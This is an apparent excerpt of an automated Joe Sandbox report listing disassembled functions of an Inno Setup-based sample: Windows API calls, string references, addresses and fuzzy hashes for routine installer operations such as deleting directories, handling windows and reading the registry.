                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                • API String ID: 2704155762-2318956294
                                                                                • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00459F8E), ref: 00459ED2
                                                                                  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                Strings
                                                                                • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                • Stripped read-only attribute., xrefs: 00459E94
                                                                                • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                • Deleting directory: %s, xrefs: 00459E5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorFindLast
                                                                                • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                • API String ID: 754982922-1448842058
                                                                                • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                APIs
                                                                                • GetCapture.USER32 ref: 00422EA4
                                                                                • GetCapture.USER32 ref: 00422EB3
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                • ReleaseCapture.USER32 ref: 00422EBE
                                                                                • GetActiveWindow.USER32 ref: 00422ECD
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                • GetActiveWindow.USER32 ref: 00422FBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
• Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
APIs
• GetDC.USER32(00000000), ref: 0042948A
• GetTextMetricsA.GDI32(00000000), ref: 00429493
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 004294A2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
• SelectObject.GDI32(00000000,00000000), ref: 004294B6
• ReleaseDC.USER32(00000000,00000000), ref: 004294BE
• GetSystemMetrics.USER32(00000006), ref: 004294E3
• GetSystemMetrics.USER32(00000006), ref: 004294FD
Similarity
• API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
• String ID:
• API String ID: 1583807278-0
• Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
• Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
APIs
• GetDC.USER32(00000000), ref: 0041DE27
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
• ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
• MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
• GetStockObject.GDI32(00000007), ref: 0041DE5B
• GetStockObject.GDI32(00000005), ref: 0041DE67
• GetStockObject.GDI32(0000000D), ref: 0041DE73
• LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
Similarity
• API ID: ObjectStock$CapsDeviceIconLoadRelease
• String ID:
• API String ID: 225703358-0
• Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
• Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
• Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
• Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
APIs
• LoadCursorA.USER32(00000000,00007F02), ref: 00463344
• SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
• SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
Similarity
• API ID: Cursor$Load
• String ID: $ $Internal error: Item already expanding
• API String ID: 1675784387-1948079669
• Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
• Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
Similarity
• API ID: PrivateProfileStringWrite
• String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
• API String ID: 390214022-3304407042
• Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
• Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
• SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
• GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
Similarity
• API ID: ClassInfoLongMessageSendWindow
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3391662889-4234151509
• Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
• Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
• Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
APIs
• GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
• Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
• Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
• DeleteObject.GDI32(?), ref: 0041BF9F
• DeleteObject.GDI32(?), ref: 0041BFA8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
• Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
• GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
• SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
• RealizePalette.GDI32(?), ref: 0041CF92
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
• SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
Similarity
• API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
• String ID:
• API String ID: 2222416421-0
• Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
• Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
APIs
• SendMessageA.USER32(00000000,?,?), ref: 0045732E
  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
• TranslateMessage.USER32(?), ref: 004573B3
• DispatchMessageA.USER32(?), ref: 004573BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                • String ID: [Paused]
                                                                                • API String ID: 1007367021-4230553315
                                                                                • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                APIs
                                                                                • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LoadSleep
                                                                                • String ID: CheckPassword
                                                                                • API String ID: 4023313301-1302249611
                                                                                • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                APIs
                                                                                  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                Strings
                                                                                • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                • API String ID: 613034392-3771334282
                                                                                • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 0045983F
                                                                                Strings
                                                                                • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                • CreateAssemblyCache, xrefs: 00459836
                                                                                • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                • Fusion.dll, xrefs: 004597DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                • API String ID: 190572456-3990135632
                                                                                • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                • GetFocus.USER32 ref: 0041C168
                                                                                • GetDC.USER32(?), ref: 0041C174
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 3303097818-0
                                                                                • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                • 6FC92980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                  • Part of subcall function 004107F8: 6FC8C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                • 6FCFCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                • 6FCFC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                • 6FCFCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                • 6FC90860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$C400C740C90860C92980
                                                                                • String ID:
                                                                                • API String ID: 992039177-0
                                                                                • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                Strings
                                                                                Memory Dump Source
